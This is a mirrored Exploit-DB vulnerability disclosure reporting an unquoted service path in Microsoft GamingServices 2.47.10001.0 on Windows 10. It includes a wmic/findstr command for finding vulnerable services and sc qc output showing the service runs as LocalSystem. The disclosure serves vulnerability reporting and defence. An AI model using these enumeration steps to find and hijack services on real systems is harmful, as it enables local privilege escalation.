Microsoft GamingServices 2.47.10001.0 – ‘GamingServices’ Unquoted Service Path - 体验盒子

作者： Ismael Nava

日期： 2020-12-08

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/49214/

# Exploit Title: Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 02-12-2020
# Vendor Homepage: https://www.microsoft.com
# Software Links : https://www.microsoft.com/en-us/p/xbox-beta/9mv0b5hzvk9z?activetab=pivot:overviewtab
# Tested Version: 2.47.10001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
GamingServices GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto
GamingServicesNet GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto

C:\>sc qc "GamingServicesNet"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: GamingServicesNet
TIPO : 210WIN32_PACKAGED_PROCESS
TIPO_INICIO: 2 AUTO_START
CONTROL_ERROR: 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
GRUPO_ORDEN_CARGA:
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServicesNet
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: NT AUTHORITY\LocalService

C:\>sc qc "GamingServices"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: GamingServices
TIPO : 210WIN32_PACKAGED_PROCESS
TIPO_INICIO: 2 AUTO_START
CONTROL_ERROR: 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe
GRUPO_ORDEN_CARGA:
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServices
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: LocalSystem